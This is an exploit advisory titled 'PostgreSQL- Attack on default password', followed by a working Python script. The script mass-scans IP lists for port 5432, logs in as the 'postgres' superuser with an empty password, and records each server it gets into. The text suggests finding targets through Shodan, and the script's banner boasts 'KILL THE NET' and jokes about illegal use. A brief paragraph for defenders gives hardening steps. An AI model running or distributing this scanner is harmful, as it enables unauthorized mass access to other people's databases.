PostgreSQL- Attack on default password

2019.04.11
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################## PostgreSQL- Attack on default password ##########################
An easy way to get access to a database without any brute-force attack.
[+]- Scan ips on port 5432 or Dork on Shodan.
[+]-Exploit: user = "postgres" password = "" port = "5432" database = "postgres" and connect to the database.
Note for defenders: this login succeeds only where the server lets the "postgres" superuser in over the network without a password, typically a `trust` entry in pg_hba.conf that matches remote addresses; switching that entry to `scram-sha-256` with a strong password, narrowing `listen_addresses` and firewalling port 5432 removes the exposure, and `log_connections` makes such logins visible in the server log.
##########################
For mass scanning, put your IPs in a text file and run the script :)
##########################
USAGE : python script.py ips.txt
----------------------------------------------
# -*- coding: utf-8 -* #!/usr/bin/python ##################################### ##KILL THE NET## #### PS: CHANGE Your Threads pool on line 105 to make script more faster :) ##############[LIBS]################### import os, sys, codecs, random, socket from multiprocessing.dummy import Pool import time from time import time as timer from platform import system from colorama import init try: import psycopg2 except ImportError: print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++') print('[-] pip install psycopg2') print('[+] you need to install psycopg2 module (For MacOS try with brew)') sys.exit() init(autoreset=True) ########################################################################################## ktnred = '\033[31m' ktngreen = '\033[32m' ktn3yell = '\033[33m' ktn4blue = '\033[34m' ktn5purp = '\033[35m' ktn6blueblue = '\033[36m' ktn7grey = '\033[37m' CEND = '\033[0m' ##################################### ########################################################################################## try: with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f: ooo = f.read().splitlines() except IndexError: print (ktnred + '[+]================> ' + 'USAGE: '+sys.argv[0]+' listip.txt' + CEND) pass ooo = list((ooo)) ########################################################################################## def checkip(ooo): ip = ooo sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) killz = 
sock.connect_ex((ip,5432)) if killz == 0: print (ktn5purp + '[+]=[ GOOD IP: '+ ip +' ]=[+]' + CEND) connect(ip) else: print (ktnred + '[+]=[SOORY NOT GOOD IP: ' + ip +' ]=[+]' + CEND) pass def connect(ip): try: connection = psycopg2.connect(user = "postgres", password = "", host = ip, port = "5432", database = "postgres") cursor = connection.cursor() # Print PostgreSQL Connection properties print ( connection.get_dsn_parameters(),"\n") # Print PostgreSQL version cursor.execute("SELECT version();") record = cursor.fetchone() print("You are connected to - ", record, "\n") open('connected-db.txt', 'a').write('=='*5 + '[START]' + '=='*5 + '\n' + '[IP]: '+ ip + '\n'+'[USER: postgres, PASSWORD: NULL, PORT: 5432, DB: postgres]' + '\n' + '=='*5 + '[END]' + '=='*5 + '\n') except: print ("Error while connecting to PostgreSQL") ########################################################################################## ########################################################################################## def logo(): clear = "\x1b[0m" colors = [36, 32, 34, 35, 31, 37] x = ''' FEDERATION BLACK HAT SYSTEM | IG: @_gghost666_ <-.(`-') _ (`-') (`-').-> (`-') _<-. (`-')_ (`-') _(`-') __( OO) (_) <-. <-. ( OO).-> (OO )__ ( OO).-/ \( OO) ) ( OO).-/( OO).-> '-'. ,--.,-(`-'),--. ) ,--. ) / '._ ,--. ,'-'(,------.,--./ ,--/ (,------./ '._ | .' /| ( OO)| (`-') | (`-')|'--...__)| | | | | .---'| \ | | | .---'|'--...__) | /)| | )| |OO ) | |OO )`--. .--'| `-' |(| '--. | . '| |)(| '--. `--. .--' | . '(| |_/(| '__ |(| '__ | | | | .-. | | .--' | |\ | | .--' | | | |\ \| |'->| |' | |' | | | | | | | `---.| | \ | | `---. | | `--' '--'`--' `-----' `-----' `--' `--' `--' `------'`--' `--' `------' `--' KILL THE NET FB: fb/KtN.1990 Note! : We Accept any responsibility for any illegal usage :). 
''' for N, line in enumerate(x.split("\n")): sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear)) time.sleep(0.05) pass logo() ########################################################################################## def Main(): try: start = timer() ThreadPool = Pool(50) Threads = ThreadPool.map(checkip, ooo) print('TIME TAKE: ' + str(timer() - start) + ' S') except: pass if __name__ == '__main__': Main()

References:

https://github.com/KTN1990/PostgreSQL--Attack-on-default-password-AUTOEXPLOITING